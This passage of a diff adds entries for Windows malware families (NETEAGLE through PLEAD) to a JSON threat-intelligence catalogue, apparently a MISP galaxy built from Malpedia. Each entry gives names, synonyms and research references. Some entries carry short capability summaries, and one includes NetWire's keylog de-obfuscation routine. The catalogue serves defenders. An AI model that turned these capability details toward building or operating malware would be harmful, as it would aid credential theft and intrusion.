"https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", + "value": "NETEAGLE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger", + "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" + ] + }, + "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", + "value": "Netrepser", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", + "http://www.netsupportmanager.com/index.asp", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", + "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" + ] + }, + "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", + "value": "NetSupportManager RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "TravNet" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", + "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", + "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" + ] + }, + "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928", + "value": "NetTraveler", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Recam" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", + "https://www.circl.lu/pub/tr-23/", + "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", + "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html" + ] + }, + "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740", + "value": "NetWire RC", + "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", + "https://www.ncsc.gov.uk/alerts/turla-group-malware" + ] + }, + "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", + "value": "Neuron", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Kasidet" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", + "http://securitykitten.github.io/an-evening-with-n3utrino/", + "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", + "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", + "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", + "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", + "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", + "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/" + ] + }, + "uuid": "3760920e-4d1a-40d8-9e60-508079499076", + "value": "Neutrino", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Jimmy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", + "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", + "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" + ] + }, + "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", + "value": "Neutrino POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", + "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" + ] + }, + "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", + "value": "NewCore RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", + "https://asert.arbornetworks.com/lets-talk-about-newposthings/", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", + "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" + ] + }, + "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", + "value": "NewPosThings", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", + "value": "NewsReels", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" + ] + }, + "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421", + "value": "NewCT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot", + "https://twitter.com/benkow_/status/789006720668405760" + ] + }, + "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", + "value": "Nexster Bot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger", + "https://twitter.com/PhysicalDrive0/status/842853292124360706", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/" + ] + }, + "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", + "value": "NexusLogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", + "https://research.checkpoint.com/ramnits-network-proxy-servers/" + ] + }, + "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", + "value": "Ngioweb", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove", + "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html" + ] + }, + "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130", + "value": "nitlove", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" + ] + }, + "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", + "value": "Nitol", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bladabindi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", + "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", + "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", + "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", + "value": "NjRAT", + "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer", + "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" + ] + }, + "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", + "value": "Nocturnal Stealer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + ] + }, + "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", + "value": "Nokki", + "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" + ] + }, + "uuid": "6207668d-af17-44a6-97a2-e1b448264529", + "value": "Nozelesn (Decryptor)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom", + "https://twitter.com/malwrhunterteam/status/910952333084971008", + "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", + "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/" + ] + }, + "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", + "value": "nRansom", + "description": "" + }, + { + "meta": { + "synonyms": [ + "nymain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", + "https://www.cert.pl/en/news/single/nymaim-revisited/", + "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", + "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", + "https://bitbucket.org/daniel_plohmann/idapatchwork" + ] + }, + "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", + "value": "Nymaim", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2", + "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" + ] + }, + "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", + "value": "Nymaim2", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" + ] + }, + "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", + "value": "OddJob", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" + ] + }, + "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", + "value": "Odinaff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", + "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", + "https://securelist.com/the-devils-in-the-rich-header/84348/", + "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", + "https://securelist.com/olympic-destroyer-is-still-alive/86169/", + "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", + "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", + "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" + ] + }, + "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", + "value": "Olympic Destroyer", + "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", + "https://twitter.com/malwrhunterteam/status/1001461507513880576" + ] + }, + "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", + "value": "OneKeyLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", + "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" + ] + }, + "uuid": "82733125-da67-44ff-b2ac-b16226088211", + "value": "ONHAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", + "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html", + "https://www.f-secure.com/weblog/archives/00002764.html" + ] + }, + "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", + "value": "OnionDuke", + "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. " + }, + { + "meta": { + "synonyms": [ + "SBot", + "Onliner" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", + "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" + ] + }, + "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", + "value": "OnlinerSpambot", + "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" + ] + }, + "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", + "value": "OopsIE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", + "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html", + "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", + "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", + "https://forum.malekal.com/viewtopic.php?t=21806" + ] + }, + "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", + "value": "Opachki", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", + "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" + ] + }, + "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", + "value": "OpGhoul", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" + ] + }, + "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", + "value": "OpBlockBuster", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", + "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" + ] + }, + "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", + "value": "OrcaRAT", + "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", + "https://orcustechnologies.com/", + "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", + "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", + "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors" + ] + }, + "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", + "value": "Orcus RAT", + "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", + "https://www.gdata.de/blog/2017/11/30151-ordinypt", + "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/" + ] + }, + "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", + "value": "Ordinypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", + "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", + "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" + ] + }, + "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", + "value": "Overlay RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", + "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" + ] + }, + "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", + "value": "OvidiyStealer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "luckyowa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", + "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" + ] + }, + "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", + "value": "owaauth", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", + "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/", + "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/" + ] + }, + "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", + "value": "PadCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", + "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", + "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" + ] + }, + "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", + "value": "paladin", + "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011." + }, + { + "meta": { + "synonyms": [ + "ZeusPanda" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", + "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", + "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", + "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", + "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", + "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", + "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", + "https://www.spamhaus.org/news/article/771/", + "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", + "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", + "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", + "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", + "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", + "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", + "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", + "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" + ] + }, + "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", + "value": "PandaBanker", + "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", + "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" + ] + }, + "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", + "value": "parasite_http", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" + ] + }, + "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", + "value": "Penco", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", + "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" + ] + }, + "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", + "value": "PetrWrap", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", + "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", + "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", + "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", + "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/" + ] + }, + "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", + "value": "Petya", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ReRol" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", + "https://community.fireeye.com/external/1093" + ] + }, + "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", + "value": "pgift", + "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", + "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", + "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", + "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", + "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/", + "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/" + ] + }, + "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", + "value": "Philadephia Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Trik" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", + "https://www.johannesbader.ch/2016/02/phorpiex/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", + "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", + "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" + ] + }, + "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", + "value": "Phorpiex", + "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", + "https://www.snort.org/rule_docs/1-26941" + ] + }, + "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", + "value": "pipcreat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", + "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" + ] + }, + "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", + "value": "pirpi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", + "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", + "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" + ] + }, + "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", + "value": "Pitou", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", + "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/", + "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf" + ] + }, + "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", + "value": "PittyTiger RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Pykbot", + "TBag", + "Bublik" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", + "http://blog.kleissner.org/?p=788", + "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", + "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" + ] + }, + "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", + "value": "Pkybot", + "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + ] + }, + "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", + "value": "PLAINTEE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", + "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" + ] + }, + "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", + "value": "playwork", + "description": "" + }, + { + "meta": { + "synonyms": [ + "TSCookie" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", + "http://www.freebuf.com/column/159865.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", + "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", + "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", + "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", + "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/" + ] + }, + "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", + "value": "PLEAD", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 